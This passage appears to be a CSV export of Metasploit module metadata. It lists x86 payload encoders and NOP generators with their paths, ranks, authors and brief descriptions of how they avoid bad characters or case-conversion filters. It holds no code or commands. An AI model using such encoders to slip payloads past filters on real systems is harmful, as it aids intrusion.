The changes introduced are (1) avoid the use of the 0x5f byte (underscore) in because it is a badchar in the CVE-2012-2329 case and (2) optimize the transformation block, having into account more relaxed conditions about bad characters greater than 0x80.","Metasploit Framework License (BSD)","f",,,,,"t",,"juan vazquez , skape " 2320,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/avoid_utf8_tolower.rb","encoder","x86/avoid_utf8_tolower","encoder/x86/avoid_utf8_tolower","Avoid UTF8/tolower",0,"UTF8 Safe, tolower Safe Encoder","Metasploit Framework License (BSD)","f",,,,,"t",,"skape " 2321,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/bloxor.rb","encoder","x86/bloxor","encoder/x86/bloxor","BloXor - A Metamorphic Block Based XOR Encoder",0,"A Metamorphic Block Based XOR Encoder.","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2322,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/call4_dword_xor.rb","encoder","x86/call4_dword_xor","encoder/x86/call4_dword_xor","Call+4 Dword XOR Encoder",300,"Call+4 Dword XOR Encoder","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , spoonm " 2323,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/context_cpuid.rb","encoder","x86/context_cpuid","encoder/x86/context_cpuid","CPUID-based Context Keyed Payload Encoder",0,"This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.","Metasploit Framework License (BSD)","f",,,,,"t",,"Dimitris Glynos" 2324,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/context_stat.rb","encoder","x86/context_stat","encoder/x86/context_stat","stat(2)-based Context Keyed Payload Encoder",0,"This is a Context-Keyed Payload Encoder based on stat(2) and Shikata Ga Nai.","Metasploit Framework License (BSD)","f",,,,,"t",,"Dimitris Glynos" 2325,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/context_time.rb","encoder","x86/context_time","encoder/x86/context_time","time(2)-based Context Keyed Payload Encoder",0,"This is a Context-Keyed Payload Encoder based on time(2) and Shikata Ga Nai.","Metasploit Framework License (BSD)","f",,,,,"t",,"Dimitris Glynos" 2326,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/countdown.rb","encoder","x86/countdown","encoder/x86/countdown","Single-byte XOR Countdown Encoder",300,"This encoder uses the length of the payload as a position-dependent encoder key to produce a small decoder stub.","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2327,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/fnstenv_mov.rb","encoder","x86/fnstenv_mov","encoder/x86/fnstenv_mov","Variable-length Fnstenv/mov Dword XOR Encoder",300,"This encoder uses a variable-length mov equivalent instruction with fnstenv for getip.","Metasploit Framework License (BSD)","f",,,,,"t",,"spoonm " 2328,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/jmp_call_additive.rb","encoder","x86/jmp_call_additive","encoder/x86/jmp_call_additive","Jump/Call XOR Additive Feedback Encoder",300,"Jump/Call XOR Additive Feedback","Metasploit Framework License (BSD)","f",,,,,"t",,"skape " 2329,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/nonalpha.rb","encoder","x86/nonalpha","encoder/x86/nonalpha","Non-Alpha Encoder",100,"Encodes payloads as non-alpha based bytes. This allows payloads to bypass both toupper() and tolower() calls, but will fail isalpha(). Table based design from Russel Sanford.","BSD License","f",,,,,"t",,"pusscat " 2330,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/nonupper.rb","encoder","x86/nonupper","encoder/x86/nonupper","Non-Upper Encoder",100,"Encodes payloads as non-alpha based bytes. 
This allows payloads to bypass tolower() calls, but will fail isalpha(). Table based design from Russel Sanford.","BSD License","f",,,,,"t",,"pusscat " 2331,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/shikata_ga_nai.rb","encoder","x86/shikata_ga_nai","encoder/x86/shikata_ga_nai","Polymorphic XOR Additive Feedback Encoder",600,"This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction substitution and dynamic block ordering. Registers are also selected dynamically.","Metasploit Framework License (BSD)","f",,,,,"t",,"spoonm " 2332,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/single_static_bit.rb","encoder","x86/single_static_bit","encoder/x86/single_static_bit","Single Static Bit",0,"Static value for specific bit","Metasploit Framework License (BSD)","f",,,,,"t",,"jduck " 2333,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/unicode_mixed.rb","encoder","x86/unicode_mixed","encoder/x86/unicode_mixed","Alpha2 Alphanumeric Unicode Mixedcase Encoder",0,"Encodes payloads as unicode-safe mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite.","BSD License","f",,,,,"t",,"pusscat , skylined " 2334,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/unicode_upper.rb","encoder","x86/unicode_upper","encoder/x86/unicode_upper","Alpha2 Alphanumeric Unicode Uppercase Encoder",0,"Encodes payload as unicode-safe uppercase text. 
This encoder uses SkyLined's Alpha2 encoding suite.","BSD License","f",,,,,"t",,"pusscat , skylined " 2335,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/armle/simple.rb","nop","armle/simple","nop/armle/simple","Simple",300,"Simple NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2336,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/php/generic.rb","nop","php/generic","nop/php/generic","PHP Nop Generator",300,"Generates harmless padding for PHP scripts","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2337,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/ppc/simple.rb","nop","ppc/simple","nop/ppc/simple","Simple",300,"Simple NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2338,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/sparc/random.rb","nop","sparc/random","nop/sparc/random","SPARC NOP Generator",300,"SPARC NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2339,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/tty/generic.rb","nop","tty/generic","nop/tty/generic","TTY Nop Generator",300,"Generates harmless padding for TTY input","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2340,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/x64/simple.rb","nop","x64/simple","nop/x64/simple","Simple",300,"An x64 single/multi byte NOP instruction generator.","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2341,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/x86/opty2.rb","nop","x86/opty2","nop/x86/opty2","Opty2",300,"Opty2 multi-byte NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"optyx , spoonm " 2342,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/x86/single_byte.rb","nop","x86/single_byte","nop/x86/single_byte","Single Byte",300,"Single-byte NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"spoonm "